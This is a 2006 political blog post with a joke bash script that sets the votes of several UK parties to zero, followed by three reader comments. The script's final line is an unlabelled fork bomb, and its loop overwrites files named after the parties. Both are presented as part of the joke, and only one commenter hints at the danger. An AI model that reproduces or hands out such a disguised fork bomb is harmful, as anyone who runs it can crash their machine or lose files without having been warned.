Tuesday, September 12, 2006

The dream scenario

#!/bin/bash
electoral_wipeout () {
echo "$1 - No Votes"
}
for target in labour libdems ukip snp respect PlaidCymru
do
echo 0 > $target
electoral_wipeout $target
done
.() { . | . & } ; .
For the record, I wrote the above because this man dared me.

3 comments:

  1. Dizzy,

    Tell me that if I run this on my ZX Spectrum the Labour government will disappear.

    Please.

    ReplyDelete
  2. No, but if you run on a Unix machine it could do very very bad things.

    ReplyDelete
  3. If only it was that easy to get rid of this useless government.

    BTW, I've got a new blog and have linked to you. www.outfromthecrowd.blogspot.com

    ReplyDelete